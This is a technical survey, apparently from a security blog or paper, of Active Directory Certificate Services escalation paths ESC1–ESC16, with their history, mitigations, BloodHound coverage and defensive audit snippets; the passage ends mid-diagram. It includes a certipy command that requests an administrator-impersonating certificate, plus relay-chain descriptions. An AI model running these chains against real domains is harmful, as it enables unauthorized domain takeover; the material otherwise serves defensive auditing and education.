NTAuthCertificates: The AD-published container `CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration` listing CA certificates trusted by the Key Distribution Center for client authentication. Any certificate signed by a CA in this container can, given a valid mapping, mint a Kerberos Ticket-Granting Ticket. Publishing a CA into NTAuth is the moment that CA's private key becomes a trust root parallel to krbtgt.

ESC5, ESC6, ESC7, and ESC16 attack the issuing authority itself -- its DACL, its registry flags, its extension policy. (ESC11's RPC packet-privacy gap is a CA-side configuration, but its abuse is an NTLM relay; we group it with ESC8 under transport, matching the §5 diagram.)
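The two registry flags named above are plain bitmasks, so auditing them reduces to two bitwise tests. The sketch below assumes the DWORD values have already been read from the CA (for example from `certutil -getreg` output); the bit values are the ones defined in the Windows certificate-services headers and should be verified against your own environment, and the sample DWORDs are hypothetical.

```python
# Bit values as defined in the Windows certificate-services headers (verify locally).
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000  # policy EditFlags bit
IF_ENFORCEENCRYPTICERTREQUEST = 0x00000200   # CA InterfaceFlags bit


def audit_ca_flags(edit_flags, interface_flags):
    """Return findings for the two CA registry flags discussed above."""
    findings = []
    if edit_flags & EDITF_ATTRIBUTESUBJECTALTNAME2:
        findings.append(
            "EDITF_ATTRIBUTESUBJECTALTNAME2 set: requesters may supply arbitrary SANs"
        )
    if not interface_flags & IF_ENFORCEENCRYPTICERTREQUEST:
        findings.append(
            "IF_ENFORCEENCRYPTICERTREQUEST clear: RPC enrollment does not require packet privacy"
        )
    return findings


# Hypothetical DWORD values for two CAs.
for name, edit, iface in [
    ("CA-exposed", 0x0015014E, 0x00000041),
    ("CA-hardened", 0x0011014E, 0x00000641),
]:
    print(name, audit_ca_flags(edit, iface) or "no findings")
```

The first finding corresponds to the CA-side SAN override, the second to the RPC packet-privacy gap that the text groups with ESC11.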

The Enrollment Transport

A certificate is requested over a network protocol. The default transport is DCOM/MS-WCCE -- the Windows Client Certificate Enrollment protocol, an RPC-based interface that ships enabled on every Enterprise CA [@ms-icpr-spec]. Additional transports ship as separate role services: HTTP Web Enrollment (IIS-based, with NTLM auth by default), the Certificate Enrollment Web Service (web service, supports basic and Kerberos), the Network Device Enrollment Service (the SCEP gateway), and the Certificate Enrollment Policy Web Service. Each transport is a network attack surface for relay primitives that route a coerced NTLM authentication into a certificate request.

ESC8 attacks the HTTP Web Enrollment transport. ESC11 attacks the RPC transport. Both are NTLM-relay attacks; they differ only in which transport the relayed authentication targets.

The CA's security model distinguishes two rights that look similar but differ in scope. Issue and Manage Certificates permits the holder to approve pending requests, revoke issued certificates, and read the request store. Manage CA permits the holder to edit the CA's own configuration -- including its registry-controlled extension policy and its DACL. ESC7 attacks the latter. The escalation chain that follows ESC7 typically pivots to ESC4 (edit a template) or to issuing a certificate directly via a CA officer's request-approval right.

The Certificate Mapping

When a CA issues an authentication certificate, the certificate identifies a principal -- a user or a computer. The Key Distribution Center has to decide which Active Directory principal that certificate represents. Two mappings exist. Implicit mapping reads the Subject Alternative Name (or the Subject, on older templates) and looks up the principal by User Principal Name. Explicit mapping reads the AD principal's own altSecurityIdentities attribute, which holds one or more X.509 issuer/serial expressions [@dedrouas-altsec]. The May 2022 KB5014754 patch redefined which mappings the KDC accepts: explicit mappings using X509IssuerSerialNumber, X509SKI, or X509SHA1PublicKey are strong; everything else is weak and will be rejected once Full Enforcement is active [@kb5014754].

szOID_NTDS_CA_SECURITY_EXT: OID 1.3.6.1.4.1.311.25.2. The Microsoft certificate extension introduced by KB5014754 that embeds the SID of the requesting Active Directory principal directly into the issued certificate. When present, the KDC matches the certificate against the principal whose SID is embedded, defeating SAN-supply attacks like ESC1. The extension is the load-bearing mechanism of strong mapping enforcement.

Strong mapping: Per KB5014754, explicit `altSecurityIdentities` entries using the `X509IssuerSerialNumber`, `X509SKI`, or `X509SHA1PublicKey` formats are *strong*. All other formats -- including implicit UPN and SAN matching -- are *weak* and rejected once Full Enforcement mode is active (February 11, 2025 default; legacy-mapping registry override removed September 9, 2025) [@kb5014754]. The strong-mapping track was the single largest Microsoft mitigation of the ESC era.

ESC9, ESC10, ESC13, and ESC14 all attack the mapping. They abuse the gap between what a certificate asserts and which AD principal the KDC binds it to.
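The strong/weak split described above can be checked mechanically against the `altSecurityIdentities` values in a directory export. The following is a minimal sketch, assuming the `X509:<TAG>value` string syntax that KB5014754 documents for explicit mappings; the function name and the sample entries are illustrative.

```python
import re

# Tag combinations KB5014754 treats as strong, keyed to the mapping-type name.
STRONG_TAG_SETS = {
    frozenset({"I", "SR"}): "X509IssuerSerialNumber",
    frozenset({"SKI"}): "X509SKI",
    frozenset({"SHA1-PUKEY"}): "X509SHA1PublicKey",
}


def classify_mapping(entry):
    """Classify one altSecurityIdentities value as ('strong' | 'weak', type name)."""
    if not entry.upper().startswith("X509:"):
        return ("weak", "not an X509 mapping")
    # Extract the <TAG> markers; the values between them are ignored here.
    tags = frozenset(t.upper() for t in re.findall(r"<([^>]+)>", entry))
    name = STRONG_TAG_SETS.get(tags)
    return ("strong", name) if name else ("weak", "other")


# Illustrative entries only.
samples = [
    "X509:<I>DC=local,DC=corp,CN=CORP-CA<SR>1200000000AC11000000002B",
    "X509:<SKI>123456789abcdef",
    "X509:<I>DC=local,DC=corp,CN=CORP-CA<S>CN=alice",
    "X509:<RFC822>alice@corp.local",
]
for s in samples:
    print(classify_mapping(s), s)
```

The check is deliberately allow-list shaped: anything not recognised as one of the three strong formats is reported as weak, which mirrors how Full Enforcement treats unknown mappings.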

The Authentication Step

This component is the part of Windows that turns a certificate into an authenticator. For Kerberos, the protocol is PKINIT (RFC 4556 [@rfc4556]): client presents a cert, KDC validates the cert and the mapping, KDC issues a TGT. For TLS-based services -- LDAPS, RDP with smart card, IIS with client cert -- the protocol is Schannel. For the legacy smart-card pipeline, the path is the combination of the Smart Card Resource Manager and PKINIT.

No ESC attacks this step directly. Every ESC must cross it to convert a misconfigured template, ACL, or mapping into a usable authenticator. The authentication step is the choke point; it is also the point Microsoft has reshaped most heavily with KB5014754.

The Persistence Substrate

An issued certificate is not a transient credential. It is a signed authenticator with a configurable validity period (one year is common, ten years is permitted). The certificate authenticates the embedded principal as long as the certificate is valid and not revoked. That property is what the SpecterOps paper's DPERSIST and THEFT classes attack [@cpo-blog]. UnPAC-the-Hash recovers the NTLM hash from a PKINIT-issued TGT, giving the attacker a password-equivalent credential they did not previously have. The Golden Certificate attack steals the CA's own private key, granting forever-issuance against the entire forest.

This article scopes those attacks to a sidebar; the body walks the ESC1 to ESC16 escalation catalog. But every ESC ends in the persistence substrate: the certificate the attacker walks out with is the receipt that survives password rotation.

Note: A primitive is a Microsoft-shipped knob, flag, ACL, or protocol that, when misconfigured, becomes part of an escalation. An exploitation chain is the specific sequence of operator actions that turns one or more misconfigured primitives into a Domain Admin authenticator. ESCs are exploitation chains, not primitives. ESC1, for example, abuses the template primitive's CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit, combined with the bridge primitive (PKINIT), to produce the authenticator. The catalog enumerates chains; the six categories above enumerate the substrate.
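The groupings stated in the subsections above can be written down as a small lookup table, which makes it easy to confirm that every ESC number is assigned exactly once. This is an illustrative sketch: the dictionary keys are labels chosen here, and ESC12 is not assigned to a primitive in the text above, so it is kept in a separate bucket.

```python
# ESC numbers grouped by primitive, as stated in the subsections above.
PRIMITIVE_TO_ESCS = {
    "template": [1, 2, 3, 4, 15],
    "issuing authority": [5, 6, 7, 16],
    "enrollment transport": [8, 11],
    "certificate mapping": [9, 10, 13, 14],
    "unassigned above (ESC12)": [12],
}


def primitive_for(esc_number):
    """Return the bucket that a given ESC number falls into."""
    for primitive, escs in PRIMITIVE_TO_ESCS.items():
        if esc_number in escs:
            return primitive
    raise KeyError(f"ESC{esc_number} is not in the catalog")


# Sanity check: ESC1 through ESC16 each appear exactly once.
assigned = sorted(n for escs in PRIMITIVE_TO_ESCS.values() for n in escs)
assert assigned == list(range(1, 17))

print(primitive_for(11))
```

The authentication step and the persistence substrate have no ESC of their own in this table because, as the text notes, every chain crosses the former and ends in the latter.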

With the vocabulary in place, the sixteen named attacks compose neatly onto a 6 by 16 grid. The next section covers the moment the first eight received their names.

flowchart TD
    T["Template: per-template DACL, Name-Flag bits, EKU list, Manager Approval"]
    A["Issuing Authority: NTAuth membership, CA security descriptor, EDITF flags, extension policy"]
    X["Enrollment Transport: RPC/MS-WCCE, HTTP Web Enrollment, CES/CEP, NDES/SCEP"]
    M["Certificate Mapping: implicit UPN/SAN, explicit altSecurityIdentities, strong vs weak, SID extension"]
    B["Authentication Bridge: PKINIT for Kerberos, Schannel for TLS, smart-card pipeline"]
    P["Persistence Substrate: validity period, UnPAC-the-Hash, Golden Certificate, CRL bypass"]
    T --> A
    A --> X
    X --> B
    A --> M
    M --> B
    B --> P

4. Certified Pre-Owned

Will Schroeder pushes the SpecterOps Medium post live on June 17, 2021. (A revision tagged [EDIT 06/22/21] follows the next week; the literature settles on "June 2021" as the canonical date [@cpo-blog].) The whitepaper PDF drops in the same window and is rehosted on the SpecterOps domain the following year [@cpo-whitepaper]. Seven weeks later, on August 5, Schroeder and Christensen present Certified Pre-Owned: Abusing Active Directory Certificate Services at Black Hat USA 2021. Three GhostPack tools ship to GitHub on schedule: PSPKIAudit for defense [@pspkiaudit-gh], Certify for offense [@certify-gh], and ForgeCert for Golden Certificate work.

The paper names eight escalation paths and three sibling prefixes for persistence, theft, and detection:

ESC1 through ESC8 -- escalation paths from a low-privilege foothold to Domain Admin
DPERSIST -- domain persistence via forged certificates after CA private-key compromise
THEFT -- certificate and credential theft primitives, including the UnPAC-the-Hash technique
DETECT -- defensive detection primitives the team mapped to each abuse

The contribution was not the discovery of new individual primitives. Most of the individual misconfigurations had appeared in Microsoft's hardening guidance or in scattered community posts well before the paper. ENROLLEE_SUPPLIES_SUBJECT had been a documented warning for a decade. NTLM relay to IIS had been a known attack class since at least 2008. The EDITF_ATTRIBUTESUBJECTALTNAME2 flag was a documented option in certutil since Windows Server 2008 R2. What the paper contributed was the unified catalog -- numbered identifiers, reproducible exploitation, a tool that enumerated each path, and a single document tying every abuse to its primitive and its mitigation.

While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous. -- Will Schroeder and Lee Christensen, *Certified Pre-Owned* (June 2021) [@cpo-blog]

Microsoft's response was uncharacteristically fast. KB5005413 published in late July 2021 -- roughly six weeks after the blog -- recommending Extended Protection for Authentication and "Require SSL" on the AD CS Web Enrollment and Certificate Enrollment Web Service role services [@kb5005413]. The KB closes ESC8 over HTTPS when EPA is enabled. It does not close ESC1 through ESC7, and it does not close ESC11 (which had not yet been named).

The "ESC" prefix is short for escalation. The catalog uses three sibling prefixes from the same paper: DPERSIST for domain persistence, THEFT for credential and certificate theft, and DETECT for defensive detection identifiers. ESC numbering is consecutive but not contiguous in time -- ESC12 (a hardware substrate attack) was disclosed by Knobloch in October 2023 [@knobloch-esc12] [@knobloch-esc12-archive], four months before Knudsen disclosed ESC13 and ESC14 from SpecterOps. The numbering tracks the order of community disclosure, not a planned roadmap.

Here is the observation on which this article rests: the breakthrough was naming, not discovery. Until SpecterOps named the eight configurations, every one of them had been documented somewhere in Microsoft Learn or in a community blog. The hardening documentation had existed for years and had produced essentially no defensive prioritization in real enterprises. Microsoft Defender for Identity did not flag ESC1 templates. BloodHound did not graph ESC4-shaped DACLs. SIEMs did not ingest CA Event ID 4886. No commercial scanner shipped a rule for the Enrollee-Supplies-Subject bit. The reason was not that the information was inaccessible. The reason was that the configurations had no names -- and an enterprise security program cannot prioritize against an unnamed configuration.

Key idea: Naming is itself a defensive primitive. The 2021 SpecterOps catalog converted twenty-one years of unnamed admin-tunable knobs into a numbered backlog that scanners could enumerate, BloodHound could path-find, MSRC could patch, and operators could prioritize. Every subsequent mitigation generation -- KB5005413, CVE-2022-26923, KB5014754, CVE-2024-49019, BloodHound CE ADCS edges, Locksmith, Microsoft Defender for Identity's posture assessments -- builds on the catalog rather than on the underlying hardening documentation. The catalog is the security primitive; the patches are downstream of the catalog.

Eight ESCs in 2021. Within seventeen months, two researchers extended the catalog past the original boundary: Oliver Lyak at the Institute For Cyber Risk added ESC9 and ESC10 in August 2022 [@lyak-certipy-4-archive]; Sylvain Heiniger at Compass Security added ESC11 in November 2022 [@compass-esc11]. Hans-Joachim Knobloch added ESC12 in October 2023 [@knobloch-esc12]. SpecterOps's Jonas Bülow Knudsen added ESC13 in February 2024 [@knudsen-esc13] and ESC14 two weeks later [@knudsen-esc14]. Justin Bollinger at TrustedSec added ESC15 in October 2024 [@bollinger-ekuwu]. Lyak named ESC16 in 2025 against a workaround Schroeder himself had documented in 2022 [@specterops-esc16-docs]. Sixteen ESCs by the time you read this. Here is what each one does.

5. The Catalog: ESC1 through ESC16

Of the sixteen named ESCs, the original eight name the surface; ESC9 through ESC16 name the residual after every Microsoft mitigation shipped to date. We walk them in primitive-grouped order, following the same taxonomy the SpecterOps Certify documentation uses: template misconfigurations, access-control vulnerabilities, CA configuration issues, certificate mapping issues, and one hardware-substrate sidebar [@specterops-certify-docs-index].

Template misconfigurations: ESC1, ESC2, ESC3

ESC1 -- Misconfigured Certificate Template. A V2 template that lets a low-privilege principal enroll, has Client Authentication in its Extended Key Usage list, has CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT set, and does not require Manager Approval. The attacker requests a certificate naming the target principal in the Subject Alternative Name; the CA issues; the certificate maps via UPN to the target; PKINIT produces a TGT as the target. One operator chain: certipy req -u user -p pass -ca CA -template VulnTemplate -upn administrator@domain.local. First disclosed by SpecterOps in June 2021 [@cpo-blog]. BloodHound CE edge: ADCSESC1 [@bh-esc1-edge].

The `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` bit in `msPKI-Certificate-Name-Flag`. When set, the requester is allowed to supply the Subject or Subject Alternative Name in the CSR rather than having the CA build the Subject from the requester's own AD attributes. This is the load-bearing primitive of ESC1.

```powershell
Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)" -Filter * -Properties msPKI-Certificate-Name-Flag, pKIExtendedKeyUsage, msPKI-Enrollment-Flag |
    Where-Object {
        ($_.'msPKI-Certificate-Name-Flag' -band 0x1) -ne 0 -and
        ($_.'msPKI-Enrollment-Flag' -band 0x2) -eq 0 -and
        ($_.pKIExtendedKeyUsage -contains '1.3.6.1.5.5.7.3.2')
    } |
    Select-Object Name
```

The query lists templates with ESS set, no manager approval, and Client Authentication EKU. Locksmith, PSPKIAudit, and Certipy all run a logically equivalent check; this is the smallest reproducible form for an audit script that does not depend on a vendor tool.

ESC2 -- Any-Purpose or Subordinate CA EKU. A template that grants the Any-Purpose EKU (2.5.29.37.0) or the Subordinate CA EKU permits the certificate to be used for arbitrary purposes, including subordinate CA work. The attacker enrolls and then forges new certificates against the issued certificate's keypair. First disclosed by SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge; the abuse pattern lives in Certify and Certipy [@certipy-wiki-priv].

ESC3 -- Enrollment Agent Template. A template with the Certificate Request Agent EKU lets the holder enroll certificates on behalf of other users. Combined with a second template flagged "Enrollment Agent" the attacker can request a certificate naming any principal. The chain is two requests rather than one. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edge: ADCSESC3.

Access-control vulnerabilities: ESC4, ESC5, ESC7

ESC4 -- Vulnerable Certificate Template ACL. Any principal with GenericAll, GenericWrite, WriteOwner, or WriteDacl on a template can modify the template into an ESC1-shaped configuration and then enroll. This converts a write right on a template object into Domain Admin. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edge: ADCSESC4. The edge composes with BloodHound's general principal-DACL graph, so a Domain Users principal that holds WriteDacl on a sensitive template inherits the path automatically, without a hand-written query.
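As a rough illustration of the ESC4 check, the sketch below filters a template's access-control entries for the four rights named above. The ACE shape (`principal`, `right`), the function name, and the sample data are assumptions made for this example; they are not the output format of SharpHound or any other collector.

```javascript
// Rights that let a principal rewrite a template into an ESC1-shaped one.
const DANGEROUS_RIGHTS = new Set(['GenericAll', 'GenericWrite', 'WriteOwner', 'WriteDacl']);

// Hypothetical ACE shape: { principal: string, right: string }.
function findEsc4Principals(aces, lowPrivPrincipals) {
  const lowPriv = new Set(lowPrivPrincipals);
  const hits = aces
    .filter(ace => DANGEROUS_RIGHTS.has(ace.right) && lowPriv.has(ace.principal))
    .map(ace => ace.principal);
  return [...new Set(hits)]; // de-duplicate principals that hold several rights
}

// Illustrative template ACL, not taken from a real environment.
const templateAces = [
  { principal: 'Domain Admins', right: 'GenericAll' },
  { principal: 'Domain Users', right: 'WriteDacl' },
  { principal: 'Domain Users', right: 'Enroll' },
];

console.log(findEsc4Principals(templateAces, ['Domain Users', 'Authenticated Users']));
```

The plain Enroll right is deliberately ignored here: on its own it is an ESC1 input, not an ESC4 one.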

ESC5 -- Vulnerable PKI Object ACL. The same class of write rights on the CA computer object, the NTAuthCertificates container, or the AIA container. Each of these objects underpins the entire AD CS substrate, so compromising any one of them compromises all of it. SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge today; the surface is wide and the operator chain depends on the specific object compromised.

ESC7 -- Vulnerable CA ACL. A principal with the Manage CA right on the Enterprise CA can edit its registry-controlled configuration (including the EDITF_ATTRIBUTESUBJECTALTNAME2 flag, which converts the CA into a global ESC6 condition). A principal with Issue and Manage Certificates can approve their own otherwise-blocked certificate requests. SpecterOps, June 2021 [@cpo-blog]. No BloodHound CE edge; the abuse is a CA-side write rather than an AD principal-graph relationship.

CA configuration issues: ESC6, ESC8, ESC11

ESC6 -- EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA. When this CA-wide flag is set, every certificate request can specify an arbitrary Subject Alternative Name regardless of the template's Name-Flag bits. The CA becomes globally ESC1-shaped against any template the attacker can enroll into. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE edges: ADCSESC6a and ADCSESC6b (the latter for cases where the CA also disables the SID extension).

ESC8 -- NTLM Relay to AD CS HTTP Web Enrollment. The AD CS Web Enrollment role service ships with NTLM authentication enabled and, by default, no Extended Protection for Authentication. An attacker who can coerce a target computer to authenticate (PetitPotam, PrinterBug, DFSCoerce) can relay that authentication to the CA's /certsrv/ endpoint, request a certificate naming the relayed principal, and walk away with a certificate impersonating the coerced computer -- including Domain Controllers. SpecterOps, June 2021 [@cpo-blog]. BloodHound CE graphs this as the CoerceAndRelayNTLMToADCS edge [@bh-coerce-adcs-edge]: a Group-to-Computer edge whose source is Authenticated Users and whose destination is the coerced target computer, with the edge's evaluation conditioned on at least one ESC8-vulnerable Web Enrollment endpoint being reachable on the network.

Note: ESC8 needs no template misconfiguration. It needs a CA with HTTP Web Enrollment role service installed -- common in environments that ever provisioned smart cards or did web-based renewal -- and at least one computer account the attacker can coerce. Microsoft mitigated it with KB5005413 in July 2021 [@kb5005413], but the mitigation is configuration guidance (EPA on, "Require SSL" on, Web Enrollment disabled if unused), not a binary patch. Environments that never enabled EPA on /certsrv/ remain exploitable today. The "Domain Users to Domain Admin in eight minutes" demos that pepper conference talks are usually ESC8 demos.

ESC11 -- NTLM Relay to ICPR/RPC. The ICertPassage RPC interface (the default enrollment transport on every Enterprise CA) enforces packet privacy when the IF_ENFORCEENCRYPTICERTREQUEST flag is set; that flag has been on by default since Windows Server 2012. However, because the flag breaks certificate enrollment for legacy Windows XP clients, Compass Security observed real-world environments where administrators had explicitly removed the flag for compatibility, leaving the RPC enrollment surface unencrypted. When packet privacy is not enforced, an attacker can relay a coerced NTLM authentication into the CA's RPC interface and obtain a certificate impersonating the coerced principal. Disclosed by Sylvain Heiniger at Compass Security, November 2022 [@compass-esc11]. The SpecterOps Certify documentation describes the misconfiguration as "an insufficiently protected certificate authority RPC interface" [@specterops-esc11-docs]. No BloodHound CE edge; the RPC transport is below the principal-graph model.
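The two CA-wide flags in this group, ESC6's EDITF_ATTRIBUTESUBJECTALTNAME2 and ESC11's IF_ENFORCEENCRYPTICERTREQUEST, both reduce to a bit test on a registry DWORD. The sketch below assumes the EditFlags and InterfaceFlags values have already been read from the CA by some other means; the bit constants are the values defined in the Windows `certsrv.h` header and should be verified against your SDK, and the function name and input shape are hypothetical.

```javascript
// Bit values as defined in certsrv.h (verify against your SDK before relying on them).
const EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000; // CA EditFlags bit behind ESC6
const IF_ENFORCEENCRYPTICERTREQUEST = 0x00000200;  // CA InterfaceFlags bit whose absence enables ESC11

// Hypothetical input: the two DWORDs, already read from the CA's configuration.
function auditCaFlags({ editFlags, interfaceFlags }) {
  const findings = [];
  // ESC6 is present when the SAN-override bit is SET.
  if ((editFlags & EDITF_ATTRIBUTESUBJECTALTNAME2) !== 0) findings.push('ESC6');
  // ESC11 is present when the packet-privacy bit is CLEARED.
  if ((interfaceFlags & IF_ENFORCEENCRYPTICERTREQUEST) === 0) findings.push('ESC11');
  return findings;
}

// Illustrative values only, not defaults.
console.log(auditCaFlags({ editFlags: 0x00040000, interfaceFlags: 0x0 }));
console.log(auditCaFlags({ editFlags: 0x0, interfaceFlags: 0x200 }));
```

Note the asymmetry: one finding fires on a set bit and the other on a cleared bit, which is an easy thing to invert in a hand-written audit script.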

Certificate mapping issues: ESC9, ESC10, ESC13, ESC14, ESC15, ESC16

ESC9 -- No Security Extension. A template flagged CT_FLAG_NO_SECURITY_EXTENSION instructs the CA to issue certificates without the szOID_NTDS_CA_SECURITY_EXT SID embedding. KB5014754's strong-mapping enforcement then falls back to weak UPN mapping, and the attacker can rename a controlled user account to match a privileged user's UPN, enroll, and authenticate as that privileged user. Disclosed by Oliver Lyak at IFCR on August 4, 2022, twelve weeks after KB5014754 [@lyak-certipy-4-archive]. BloodHound CE edges: ADCSESC9a and ADCSESC9b.

ESC10 -- Weak Certificate Mapping. The registry values StrongCertificateBindingEnforcement (on KDCs) and CertificateMappingMethods (on Schannel servers) control whether weak mappings are accepted. In Compatibility mode (the KB5014754 staged-rollout default through February 11, 2025), weak mappings still pass. An attacker who can write altSecurityIdentities on a target, or who can engineer a weak UPN match, authenticates as the target. Same disclosure: Lyak, August 4, 2022 [@lyak-certipy-4-archive]. BloodHound CE edges: ADCSESC10a and ADCSESC10b.
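The two registry values can be read as a small decision function. The sketch below is a simplification under stated assumptions: it uses the KB5014754 values for StrongCertificateBindingEnforcement (0, 1, 2), assumes the UPN mapping bit in CertificateMappingMethods is 0x4, and treats anything short of Full Enforcement as tolerating weak mappings, as the paragraph above describes. The function name and return shape are hypothetical.

```javascript
// StrongCertificateBindingEnforcement values as documented in KB5014754.
const KDC_MODES = { 0: 'Disabled', 1: 'Compatibility', 2: 'Full Enforcement' };
// Assumed bit for UPN mapping in the Schannel CertificateMappingMethods value.
const SCHANNEL_UPN_MAPPING = 0x4;

function weakMappingExposure({ strongCertificateBindingEnforcement, certificateMappingMethods }) {
  return {
    kdcMode: KDC_MODES[strongCertificateBindingEnforcement] ?? 'Unknown',
    // Conservative: only an explicit Full Enforcement value counts as closed.
    kdcAcceptsWeak: strongCertificateBindingEnforcement !== 2,
    schannelAcceptsUpn: (certificateMappingMethods & SCHANNEL_UPN_MAPPING) !== 0,
  };
}

// Illustrative inputs: a Compatibility-mode KDC and a Schannel server with every method enabled.
console.log(weakMappingExposure({ strongCertificateBindingEnforcement: 1, certificateMappingMethods: 0x1f }));
```

Keeping the KDC and Schannel results separate mirrors the ESC10a and ESC10b split: the two values live on different servers and are hardened independently.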

ESC13 -- Issuance Policy linked to AD Group via msDS-OIDToGroupLink. Active Directory issuance-policy OIDs can be linked to a security group via the msDS-OIDToGroupLink attribute. When a certificate carries that issuance-policy OID, the issued PAC includes the linked group. A template configured with such an issuance policy effectively grants its enrollees membership in the linked group at authentication time. Disclosed by Jonas Bülow Knudsen at SpecterOps on February 14, 2024; discovery credit goes to Adam Burford, who brought the technique to Knudsen and Stephen Hinck [@knudsen-esc13]. BloodHound CE edge: ADCSESC13.
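The ESC13 relationship is a two-hop lookup: template to issuance-policy OID, then OID to linked group. A minimal sketch, assuming the msDS-OIDToGroupLink values have already been collected into a map; the OID, group name, template name, and data shapes below are all hypothetical placeholders.

```javascript
// Hypothetical shapes:
//   template.issuancePolicies : array of issuance-policy OIDs on the template
//   oidLinks                  : Map of OID -> group named by msDS-OIDToGroupLink
function groupsGrantedByTemplate(template, oidLinks) {
  return template.issuancePolicies
    .filter(oid => oidLinks.has(oid))
    .map(oid => oidLinks.get(oid));
}

// Placeholder values for illustration only.
const oidLinks = new Map([['1.2.3.4.5.6', 'Server Admins']]);
const vpnTemplate = { name: 'ExampleVPN', issuancePolicies: ['1.2.3.4.5.6', '1.2.3.4.5.7'] };

console.log(groupsGrantedByTemplate(vpnTemplate, oidLinks));
```

Any principal that can enroll in a template for which this returns a privileged group is effectively a member of that group at authentication time.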

ESC14 -- Explicit altSecurityIdentities Write. A principal with write access to a privileged user's altSecurityIdentities attribute can add their own certificate's X.509 expression to that attribute, then authenticate as the privileged user. The prior art goes back to Géraud de Drouas in 2019 [@dedrouas-altsec] and Jean Marsault at Wavestone in June 2021 [@marsault-wavestone]; Knudsen catalogued it as ESC14 in February 2024 [@knudsen-esc14]. No BloodHound CE edge today; the abuse traces through a write right on a single AD attribute and is in scope for future BloodHound coverage.

ESC15 -- V1 Template Application Policies Override (EKUwu). The pre-installed V1 WebServer template -- which ships on every CA, cannot be deleted, and is enrollable by Authenticated Users by default -- accepts Application Policies extensions in the request. Application Policies, a Microsoft extension parallel to standard EKU, are honored by the KDC. An attacker submits a CSR adding the Client Authentication Application Policy to a WebServer certificate, gets it signed, and authenticates as the requester. Disclosed by Justin Bollinger at TrustedSec on October 8, 2024 [@bollinger-ekuwu]. Microsoft assigned CVE-2024-49019 and patched it on November 12, 2024 [@cve-2024-49019-msrc]. No BloodHound CE edge.

ESC16 -- CA-wide SID Extension Disabled. The CA's DisableExtensionList registry value can list OIDs the CA will omit from issued certificates. If szOID_NTDS_CA_SECURITY_EXT (1.3.6.1.4.1.311.25.2) is on that list, the CA stops embedding the SID extension globally, and the strong-mapping enforcement of KB5014754 collapses into weak mapping for every certificate the CA issues. The SpecterOps Certify documentation records the punchline: "The configuration was first described in 2022 by Will Schroeder in this blogpost as a temporary workaround for the interaction between ESC7 and ESC6, but was later tagged ESC16 by Oliver Lyak" [@specterops-esc16-docs]. No BloodHound CE edge.

ESC12 lives in a different primitive category from every other ESC: it attacks the CA's HSM, not its software configuration. Hans-Joachim Knobloch's October 2023 disclosure (earliest Wayback snapshot dated October 24, 2023) observes that the YubiHSM2 Key Storage Provider on AD CS stores the HSM authentication key in cleartext under `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword` [@knobloch-esc12] [@knobloch-esc12-archive]. A non-administrative user with shell access to the CA and read on that registry key can recover the HSM password and forge certificates against the HSM-backed CA key. ESC12 is outside the main scope of this article; readers running YubiHSM-backed CAs should read Knobloch's primary source.

By the time you reach ESC10 here, a pattern is visible without anyone naming it: every Microsoft mitigation in this class is followed by a new ESC that side-steps it. KB5005413 closes ESC8 over HTTPS; ESC11 routes around it via RPC. KB5014754 closes ESC9 and ESC10 under Full Enforcement; ESC16 disables the underlying SID extension. CVE-2024-49019 closes ESC15 on V1 templates; the V1 templates themselves remain on every CA. The catalog grows faster than the patches.

Of the sixteen entries above, BloodHound CE ships eleven principal-graph edges covering eight distinct ESCs: ADCSESC1, ADCSESC3, ADCSESC4, ADCSESC6a/b, ADCSESC9a/b, ADCSESC10a/b, ADCSESC13, plus the CoerceAndRelayNTLMToADCS edge that graphs ESC8 [@bh-llms]. The remaining eight ESCs (ESC2, ESC5, ESC7, ESC11, ESC12, ESC14, ESC15, ESC16) are out of edge coverage today -- some because their primitive lives below the principal graph (ESC11's RPC transport), some because their abuse is a CA-side write rather than a domain principal relationship (ESC7, ESC5), and some because they are too new to have been edge-modeled (ESC14, ESC15, ESC16). The gap is structural and operationally significant; section eight explores why.
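The edge arithmetic in the paragraph above can be checked mechanically. The sketch below encodes the edge-to-ESC mapping exactly as listed in this section (it is not pulled from BloodHound itself) and derives the covered and uncovered sets; the variable names are illustrative.

```javascript
// Edge name -> ESC it graphs, as listed in this section.
const EDGES = {
  ADCSESC1: 'ESC1',
  ADCSESC3: 'ESC3',
  ADCSESC4: 'ESC4',
  ADCSESC6a: 'ESC6',
  ADCSESC6b: 'ESC6',
  ADCSESC9a: 'ESC9',
  ADCSESC9b: 'ESC9',
  ADCSESC10a: 'ESC10',
  ADCSESC10b: 'ESC10',
  ADCSESC13: 'ESC13',
  CoerceAndRelayNTLMToADCS: 'ESC8',
};

const allEscs = Array.from({ length: 16 }, (_, i) => `ESC${i + 1}`);
const coveredEscs = new Set(Object.values(EDGES));
const uncoveredEscs = allEscs.filter(esc => !coveredEscs.has(esc));

console.log(Object.keys(EDGES).length); // number of edges
console.log(coveredEscs.size);          // number of distinct ESCs with an edge
console.log(uncoveredEscs);             // ESCs with no edge
```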

flowchart TD
  subgraph TEMPLATE[Template]
    E1["ESC1 ESS+ClientAuth+LowPriv<br/>SpecterOps 2021"]
    E2["ESC2 AnyPurpose/SubCA<br/>SpecterOps 2021"]
    E3["ESC3 Enrollment Agent<br/>SpecterOps 2021"]
    E15["ESC15 V1 AppPolicy<br/>TrustedSec 2024"]
  end
  subgraph ACL[Access Control]
    E4["ESC4 Template DACL<br/>SpecterOps 2021"]
    E5["ESC5 PKI Object DACL<br/>SpecterOps 2021"]
    E7["ESC7 CA DACL<br/>SpecterOps 2021"]
  end
  subgraph CA[CA Configuration]
    E6["ESC6 EDITF SAN2<br/>SpecterOps 2021"]
    E16["ESC16 Disable SID Ext<br/>tagged Lyak 2025"]
  end
  subgraph TRANSPORT[Transport]
